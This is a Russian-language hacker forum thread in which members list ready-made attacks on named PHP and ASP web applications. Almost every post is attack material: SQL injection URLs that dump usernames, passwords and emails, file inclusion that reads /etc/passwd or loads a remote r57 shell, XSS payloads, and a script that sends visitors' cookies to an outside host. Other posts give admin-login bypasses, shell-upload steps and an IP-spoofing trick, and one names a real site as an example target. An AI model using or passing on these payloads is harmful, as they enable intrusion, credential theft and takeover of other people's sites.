    subLevel2.asp?Cat_ID=33&SUB_ID=-1%20union%20select%20U_ID,U_PASSWORD,0,0,0,U_email,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20users

    Unidomedia Chameleon 1.203 LE и PRO Include файлов

    index.php?rmid=../../../../../etc/passwd%00

    PhpbbXtra 2.0 File Inclusion

    includes/archive/archive_topic.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt

    Dragon Business Directory Pro 3.01.12 SQL Injection

    bus_details.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20admin
     
    #4 +StArT+, 12.02.2007
    В последний раз редактировалось: 12.02.2007
    Это одобряет 1 пользователь.
  5. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Регистрация:
    6.12.2006
    Сообщения:
    227
    Одобрения:
    152
    Репутация:
    8
    Ещё пара штук:

    Галлереи
    4images 1.7.1
    http://[target]/[path]/index.php?template=../../../../../../../../../../../etc/passwd%00
    http://[target]/[path]/index.php?cmd=ls%0-la&template=../../data/tmp_media/suntzu1293.jpg%00

    35mmslidegallery 6
    http://example.com/lumet/album/index.php?imgdir='><script>alert(10)</script>
    http://example.comr/lumet/album/popup.php?w='><script>alert(10)</script>
    http://example.com/lumet/album/popup.php?h='><script>alert(10)</script>
    http://example.com/lumet/album/popup.php?t='><script>alert(10)</script>


    Гостевые:
    @lex Guestbook 4.0.1
    http://[victim]/[guestbook_path]/index.php?skin=[XSS]


    Форумы:
    ADNForum 1.0b
    http://host/adnforum/index.php?fid=3333'%20union%20select%201111/*

    ADP Forum 2.0.3
    http://target.com/pacth/users/username.txt

    CAForum 1.0
    admin/default.asp?password=1'%20OR%20'1'%20=%20'1

    CoolForum 0.8.3
    editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1

    CS-Forum 0.81
    read.php?msg_result=[XSS]
    /read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT]
    /index.php?search=%'[SQL_SELECT]%23
    /index.php?debut=1[SQL]

    Чаты:
    Andys Chat 4.5
    /register.PHP?action=[CMD-Script]


     
    Это одобряют 3 пользоветелей.
  6. Talisman

    Talisman Elder - Старейшина

    Регистрация:
    22.04.2006
    Сообщения:
    405
    Одобрения:
    152
    Репутация:
    48
    Гостевуха:
    Sad Raven Guest Book:
    в поле HTTP_X_FORWARDED_FOR вставляем
    HTML:
    67.22.83.13><script>img = new Image();img.src = "http://test1.ru/s.php?out="+document.cookie;</script><!-- XSS --
    и постим сообщение, более подробно тут: тут
    тут ВИДЕО
     
    Это одобряет 1 пользователь.
  7. Lesnoy_chelovek

    Lesnoy_chelovek Elder - Старейшина

    Регистрация:
    6.12.2006
    Сообщения:
    227
    Одобрения:
    152
    Репутация:
    8
    D3Jeeb:
    http://www.target.com/fastlinks.php?catid=[SQL]
    http://www.target.com/catogary.php?catid=[SQL]

    Dating Agent PRO:
    http://target.xx/picture.php?pid=1[SQL]
    http://target.xx/mem.php?mid=1[SQL]
    http://target.xx/search.php?search=3&sex=1[SQL]

    dating biz@ dating script:
    http://www.example.com/user_view.php?u=<iframe%20src=http://ha.ckers.org/scriptlet.html>

    Dawaween:
    http://www.target.com/poems/poems.php?division=diwan&action=view&offset=25&id=[sql]

    DCP-Portal 6.1.х:
    http://example/[dp_path]/library/lib.php?root=[cmd_url]

    Dev web management system 1.5:
    http://[цель]/[путь]/download_now.php?target=9999999999999[SQL]
    http://[target]/[path]/add.php?language[ENTER_ARTICLE_TITLE]=");}}--></script><script>alert(document.cookie)</script>
    http://[target]/[path]/add.php?language[SPECIFY_ZONE]=");}}--></script><script>alert(document.cookie)</script>
    http://[target]/[path]/add.php?language[ENTER_ARTICLE_HEADER]=");}}--></script><script>alert(document.cookie)</script>
    http://[target]/[path]/add.php?language[ENTER_ARTICLE_BODY]=");}}--></script><script>alert(document.cookie)</script>

    DirectContact 0.3b:
    http://[host]:[port]/..\..\..\..\windows/system.ini

    dotProject 2.0.1:
    1) /includes/db_adodb.php?baseDir=[REMOTE INCLUDE]
    2) /includes/db_connect.php?baseDir=[REMOTE INCLUDE]
    3) /includes/session.php?baseDir=[REMOTE INCLUDE]
    4) /modules/projects/gantt.php?dPconfig[root_dir]=[REMOTE INCLUDE]
    5) /modules/projects/gantt2.php?dPconfig[root_dir]=[REMOTE INCLUDE]
    6) /modules/projects/vw_files.php?dPconfig[root_dir]=[REMOTE INCLUDE]
    7) /modules/admin/vw_usr_roles.php?baseDir=[REMOTE INCLUDE]
    8) /modules/public/calendar.php?baseDir=[REMOTE INCLUDE]
    9) /modules/public/date_format.php?baseDir=[REMOTE INCLUDE]
    10) /modules/tasks/gantt.php?baseDir=[REMOTE INCLUDE]

    DVguestbook 1.0:
    http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.cookie)</script>
    http://victim/path/dv_gbook.php?d=0&f='"><script>alert(/BiyoSecurityTeam/)</script>
    http://victim/path/dv_gbook.php?d=0&f='"><script>alert(document.domain)</script>

    DVguestbook 1.2.2:
    http://victim/path/index.php?page="><script>alert(document.cookie)</script>
    http://victim/path/index.php?page="><script>alert(/Liz0ziM/)</script>
    http://victim/path/index.php?page="><script>alert(document.domain)</script>
     
  8. Alexsize

    Alexsize Fail

    Регистрация:
    17.09.2005
    Сообщения:
    1 963
    Одобрения:
    1 213
    Репутация:
    485
    От себя могу добавить парочку уязвимостей. Актуальны ОСОБЕННО для новичков. Так как очень просты. Актуальны и сейчас!

    PHP-Nuke:

    _http://www.example.com/nuke_path/iframe.php?file=ftp://user pass@evilsite.com/public_html/shell.html (or) .htm

    _http://www.example.com/nuke_path/htmltonuke.php?filnavn=ftp://user pass@evilsite.com/public_html/shell.html (or) .htm
     
    #8 Alexsize, 23.03.2007
    В последний раз редактировалось: 23.03.2007
    Это одобряет 1 пользователь.
  9. Grey

    Grey Banned

    Регистрация:
    10.06.2006
    Сообщения:
    1 049
    Одобрения:
    1 320
    Репутация:
    713
    Гостевые книги:

    1. gBook 1.4 MySQL Beta

    Можно попасть в админку минуя ввод логина и пароля:

    http://site.ru/gb/index.php?login=true

    --------------------

    2. ScozBook BETA 1.1

    Активные XSS:

    При вводе сообщения в поля AIM и Web-Site Name вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

    --------------------

    3. Tuchosoft guestbook v.0.2

    Активные XSS:

    При вводе сообщения в поля Name, email и Homepage вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

    --------------------

    4. asn guestbook 1.5

    1) Пасивная XSS:

    Code:
    http://site.ru/gb/footer.php?version=<script>alert();</script>
    2) Имея доступ к админке, можно сделать SQL инъекцию (к примеру для вывода инфы из других таблиц (к примеру таблиц от движка сайта)):

    Code:
    http://site.ru/gb/gbadmin.php?act=detil&id=-1+union+select+1,2,3,4,5,6,7,8/*
    --------------------

    5. Sad Raven's Guestbook v1.1

    Заливка шела:

    В админке выбираем "Настройки":

    http://site.ru/gb/admin.php?design

    Здесь можно редактровать файлы header.inc.php и footer.inc.php.

    К примеру редактируем файл footer.inc.php добавляя в него php код (к примеру <?php echo(123); ?>).

    Теперь заходим по адресу:

    http://site.ru/gb/design/footer.inc.php

    и видим результат выполнения скрипта.

    --------------------

    6. Destinyd-Book 1.4

    Пасивные XSS:

    Code:
    http://site.ru/gb/config/footer.php?copy=<script>alert();</script>
    Code:
    http://site.ru/gb/config/template.php?newname=<script>alert();</script>
    --------------------

    7. MLSOFT_quest 1.1

    1) Активная XSS:

    При вводе сообщения в поле e-mail вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

    2) SQL инъекция:

    Code:
    http://site.ru/gb/index.php?action=quest&next=-1+union+select+1,2,3,4,5,6,7,8/*
    --------------------

    8. SD GBook 1.0

    Активная XSS:

    При вводе сообщения в поле Город вписываем скрипт (скрипт будет выполняться при просмотре сообщений).

    --------------------

    9. XdN Guest Book 0.10

    Пасивная XSS:

    Code:
    http://site.ru/inc_footer.php?fonts=<script>alert();</script>
     
    #9 Grey, 25.04.2007
    В последний раз редактировалось: 6.10.2007
    Это одобряет 1 пользователь.
  10. Grey

    Grey Banned

    Регистрация:
    10.06.2006
    Сообщения:
    1 049
    Одобрения:
    1 320
    Репутация:
    713
    Новостные двиги:

    1. WMNews Версия 0.2

    Пасивная XSS:

    Code:
    http://site.ru/footer.php?site_title=<script>alert();</script>
    --------------------

    2. BGDev News 0.1

    SQL инъекция:

    Code:
    http://site.ru/news_comments.php?id='+union+select+1,2,3,4,5,6,7,8,9/*
    --------------------

    3. Z-Breaknews 0.1

    SQL инъекция:

    Code:
    http://site.ru/single.php?id=-1+union+select+1,2,3,4/*
    http://site.ru/single.php?id=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4/*
    --------------------

    4. OxyNews 0.4

    SQL инъекция:

    Code:
    http://site.ru/index.php?oxynews_comment_id=-1+union+select+1,2,3,4,5,6,7,8/*
    Вывод логина, пароля и мыла пользователя:

    Code:
    http://site.ru/index.php?oxynews_comment_id=-1+union+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8+from+oxynews_users/*
    --------------------

    5. NP v1.1.0

    SQL инъекция:

    Code:
    http://site.ru/view.php?id=-1+union+select+1,2,3,4,5/*
    http://site.ru/view.php?id=-1+union+select+convert(concat(database(),char(58),user(),char(58),version()),char),2,3,4,5/*
    --------------------

    6. Somery 0.4-105

    Активная XSS:

    При добавление комментария в поле name вписываем скрипт. Скрипт будет выполняться при просмотре комментариев.
     
    #10 Grey, 26.04.2007
    В последний раз редактировалось: 27.04.2007
    Это одобряют 3 пользоветелей.
  11. freddi

    freddi Elder - Старейшина

    Регистрация:
    5.07.2006
    Сообщения:
    416
    Одобрения:
    243
    Репутация:
    87
    Amiro.CMS

    Активная хсс в гостевой, уязвимы поля "Заголовок:" и
    "Сообщение:"

    Искать "Работает на: система управления сайтом Amiro CMS"
     
    #11 freddi, 26.04.2007
    В последний раз редактировалось: 26.04.2007
  12. Grey

    Grey Banned

    Регистрация:
    10.06.2006
    Сообщения:
    1 049
    Одобрения:
    1 320
    Репутация:
    713
    Бесплатные движки инет-магазинов:

    1. myInvoice 1

    SQL инъекция:

    Code:
    http://site.ru/invoice.php?id='+union+select+1,2,3,4,5,6/*
    Вывод номера, логина, хеша пароля (mysql4) и мыла пользователя:

    Code:
    http://site.ru/invoice.php?id='+union+select+1,2,3,convert(concat(clientid,char(58),name,char(58),password,char(58),email),char),5,6+from+clients/*
    --------------------

    2. Shop-Script Free

    SQL инъекция:

    Code:
    http://site.ru/index.php?CID=-1+union+select+1,2/*
    http://site.ru/index.php?CID=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char)/*
    --------------------

    3. Pricelistme! 1

    SQL инъекция:

    Code:
    http://site.ru/one_index_product.php?loginis=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
    http://site.ru/one_index_product.php?loginis=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
    ---------------------------------------------------
    ---------------------------------------------------

    Календари и органайзеры:

    1. Geo-Contacts 1.1

    SQL инъекция:

    Code:
    http://site.ru/view.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*
    http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*
    2. phpAbook 0.8.5b

    Пассивная XSS:

    Code:
    http://site.ru/include/inc.footer.php?abook_vers=<script>alert();</script>
    3. php-addressbook v1.2

    SQL инъекция:

    Code:
    http://site.ru/view.php?id=-1+union+select+1,2,3,convert(concat(database(),char(58),user(),char(58),version()),char),5,6,7,8,9,10,11,12/*
    ---------------------------------------------------
    ---------------------------------------------------


    Игры:

    1. 100 Question Simple Trivia Script 1

    SQL инъекция:

    Code:
    http://site.ru/trivia.php?trivia_id=-1+union+select+1,2,3,4,5/*
    http://site.ru/trivia.php?trivia_id=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5/*
     
    #12 Grey, 27.04.2007
    В последний раз редактировалось: 28.04.2007
  13. Grey

    Grey Banned

    Регистрация:
    10.06.2006
    Сообщения:
    1 049
    Одобрения:
    1 320
    Репутация:
    713
    Гостевые книги:

    1. EzGuestBook 1.1

    1) Активные XSS:

    При создание сообщения в поля Name, E-Mail, Message вписываем скрипт, скрипт будет выполняться при просмотре сообщений, в том чиле и в админке.

    2) SQL инъекция:

    Code:
    http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+1,2,3,4,5/*
    Вывод логина и пароля пользователя:

    Code:
    http://site.ru/guestbook.php?action=sort&by=name&from='+union+select+concat(login,char(58),password),2,3,4,5+from+ez_guestbook_auth/*
    2. ChitChat 2.0

    Активная XSS:

    При создание сообщения в поле Website вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

    3. ParkerGuestbook v4.00 Add moderators

    Из-за не корректного условия проверки логина и пароля, можно попасть в админку зная только логин или только пароль.
    Угадать логин проще - к примеру стандартный логин admin, его могут не поменять.

    Доступ к админке, имя только логин:

    http://site.ru/admin.php?adminlogin=grey&logged=1

    Доступ к админке, имя только пароль:

    http://site.ru/admin.php?adminpass=123&logged=1

    4. ParkerGuestbook v2.00

    Активные XSS:

    При создание сообщения в поля Имя, Сайт, ICQ, Город вписываем скрипт, скрипт будет выполняться при просмотре сообщений.
     
  14. Grey

    Grey Banned

    Регистрация:
    10.06.2006
    Сообщения:
    1 049
    Одобрения:
    1 320
    Репутация:
    713
    Гостевые книги:

    1. NEOgeN GuestBook 1.2

    1) Активная XSS:

    При добавление сообщения в поле Ваше Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

    2) Пасивная XSS:

    Code:
    http://site.ru/footer.php?GBookTitle=<script>alert();</script>
    2. Php Trofimov guestbook v1.0

    Активная XSS:

    При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

    3. Trofimov book v1.0

    Из-за отсутствия условия входа в админку, можно получить достп в админку:

    http://site.ru/gb.php?action=admin

    4. Rzhavin FAQ 1.0

    1) Из-за не коректного условия входа в админку, можно получить частичный достп в админку:

    http://site.ru/admin.php?showform=1

    2) Активная XSS:

    При добавление сообщения в поле Имя вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

    5. spiderLog 1.0

    Активные XSS:

    При добавление сообщения в поля Name, E-mail Address, City, State / Province, Country вписываем скрипт, скрипт будет выполняться при просмотре сообщений.

    6. Filebased Guestbook 1.0.1

    Активные XSS:

    При добавление сообщения в поля Name, Comment вписываем скрипт, скрипт будет выполняться при просмотре сообщений.
     
    Это одобряют 5 пользоветелей.
  15. Grey

    Grey Banned

    Регистрация:
    10.06.2006
    Сообщения:
    1 049
    Одобрения:
    1 320
    Репутация:
    713
    Новостные двиги:

    1. CuteNews rus v025

    Пасивная XSS:

    Code:
    http://site.ru/example2.php?dosearch=yes&story="><script>alert();</script>
    2. CuteNews.RU v.026

    Активные XSS:

    При добавление комментария в сообщение в поля Имя и Сообщение вписываем скрипт, скрипт будет выполняться при просмотре коментариев.

    3. pagenews 1.0

    1) SQL инъекция:

    Code:
    http://site.ru/insert.php?id='+union+select+1/*
    http://site.ru/insert.php?id='+union+select+convert(database(),char)/*
    2) Заливка шелла:

    При загрузке файлов на сайт, расширение файла не проверяется.

    Загружаются файлы в директрию uploads:

    http://site.ru/uploads/shell.php

    4. Sunny's Simple Diary

    SQL инъекция:

    Code:
    http://site.ru/index.php?month='+union+select+1,2,3/*
    http://localhost/1/index.php?month='+union+select+1,convert(version(),char),3/*
    5. vNews v1.2

    1) Свободный доступ в админку:

    http://site.ru/newsadmin.php

    2) Активная XSS:

    При добавление новости в поле News вписываем скрипт.

    3) SQL инъекция:

    Code:
    http://site.ru/newscontent.php?action=edit&id='+union+select+1,2,3/*
    http://site.ru/newscontent.php?action=edit&id='+union+select+1,convert(version(),char),3/*
     
    #15 Grey, 4.05.2007
    В последний раз редактировалось: 5.05.2007
    Это одобряют 3 пользоветелей.
  16. freddi

    freddi Elder - Старейшина

    Регистрация:
    5.07.2006
    Сообщения:
    416
    Одобрения:
    243
    Репутация:
    87

    А можно перейти по ссылке
    www.сайт.ru/gb/passwd.dat
    и перед нами будет:
    <?php
    $Password['логин'] = "хеш пароля";
    ?>

    пример
    http://www.ivanovo.ac.ru/win1251/fac_phys/admin.php


    еще прикольная фишка там со знаком "|" попробуйте вставлять его в поля разные.
     
    #16 freddi, 4.05.2007
    В последний раз редактировалось: 4.05.2007
    Это одобряют 2 пользоветелей.
  17. SkyMan

    SkyMan New Member

    Регистрация:
    3.12.2006
    Сообщения:
    24
    Одобрения:
    2
    Репутация:
    0
    e107 (какая версия не знаю, но не 7.8)
    Этот текст можно вставлять в сообщение на форуме, в комментарий к новости, в личное сообщение.
    [​IMG]
    где %68%74%74... - закодированный путь к снифферу со знаком вопроса в конце.
     
    #17 SkyMan, 5.05.2007
    В последний раз редактировалось: 28.05.2007
    Это одобряет 1 пользователь.
  18. +StArT+

    +StArT+ Elder - Старейшина

    Регистрация:
    10.02.2007
    Сообщения:
    34
    Одобрения:
    48
    Репутация:
    6
    На днях нашел. :)

    BlaB! Lite 2.2
    Скрипт для полноценного чата на PHP
    Активная XSS:
    .........................................................................
    Уязвимость существует из-за недостаточной
    обработки входных данных в поле "Nickname:"
    в сценарии login.php:

    В поле "Nickname:" пишем:
    Code:
    <SCRIPT>alert(document.cookie)</SCRIPT>

    Входим,отправляем сообщение,видим знакомый алерт();! ;)
    ____________________________________

    Подмена IP-адреса:
    .........................................................................
    В поле "Nickname:" пишем:

    Code:
     Желаемое имя:|:Ваше сообщение:|:Любой IP-адрес
    Входим,отправляем сообщение
    (содержание не важно!).

    Таким образом в базу заносится не ваш IP-адрес,
    а тот который вы указали!

    Пример:

    http://zeus.aegee.org/cdstuff/chat
    _____________________________________
    *********************************
     
    Это одобряют 3 пользоветелей.
  19. Grey

    Grey Banned

    Регистрация:
    10.06.2006
    Сообщения:
    1 049
    Одобрения:
    1 320
    Репутация:
    713
    Скрипт знакомств:

    Интим-услуги Nevius

    1) Пасивная XSS:

    Code:
    http://site.ru/list.php?g=<script>alert();</script>
    2) SQL инъекция:

    Code:
    http://site.ru/list.php?g=&link=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36/*
    Вывод логина и пароля пользователя:

    Code:
    http://site.ru/list.php?g=&link=-1+union+select+1,concat(login,char(58),pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+users/*
     
    Это одобряют 5 пользоветелей.
  20. Grey

    Grey Banned

    Регистрация:
    10.06.2006
    Сообщения:
    1 049
    Одобрения:
    1 320
    Репутация:
    713
    PHP Advanced Transfer Manager Full version: 1.30

    Скрипт очень дырявый, в нём еще локальный инклуд файлов находили:

    http://forum.antichat.ru/showpost.php?p=217562&postcount=8

    а вот про xss вроде не было:

    Пасивные XSS:

    viewers/txt.php

    Code:
    http://site.ru/viewers/txt.php?filename=<script>alert();</script>
    http://site.ru/viewers/txt.php?current_dir=<script>alert();</script>
    viewers/jpg.php

    Code:
    http://site.ru/viewers/jpg.php?filename="><script>alert();</script>
    http://site.ru/viewers/jpg.php?directory="><script>alert();</script>
    viewers/jpeg.php

    Code:
    http://site.ru/viewers/jpeg.php?filename="><script>alert();</script>
    http://site.ru/viewers/jpeg.php?directory="><script>alert();</script>
    viewers/gif.php

    Code:
    http://site.ru/viewers/gif.php?filename="><script>alert();</script>
    http://site.ru/viewers/gif.php?directory="><script>alert();</script>
    viewers/bmp.php

    Code:
    http://site.ru/viewers/bmp.php?filename="><script>alert();</script>
    http://site.ru/viewers/bmp.php?directory="><script>alert();</script>
    viewers/png.php

    Code:
    http://site.ru/viewers/png.php?filename="><script>alert();</script>
    http://site.ru/viewers/png.php?directory="><script>alert();</script>
    viewers/swf.php

    Code:
    http://site.ru/viewers/swf.php?filename="><script>alert();</script>
    http://site.ru/viewers/swf.php?directory="><script>alert();</script>
    viewers/mov.php

    Code:
    http://site.ru/viewers/mov.php?filename="><script>alert();</script>
    http://site.ru/viewers/mov.php?current_dir="><script>alert();</script>
    viewers/tif.php

    Code:
    http://site.ru/viewers/tif.php?filename="><script>alert();</script>
    http://site.ru/viewers/tif.php?directory="><script>alert();</script>
    Заливка шелла:
    ------------------

    В админке заходим в конфигурацию (Admin: Configure Upload Center)

    Там можно редактивровать файлы:

    footer.htm
    header.htm
    info.htm
    mailinfo.htm

    В любой из них вписываем шелл.
    Главное что бы файлы с расширением .htm выполнялись как php.
     
Загрузка...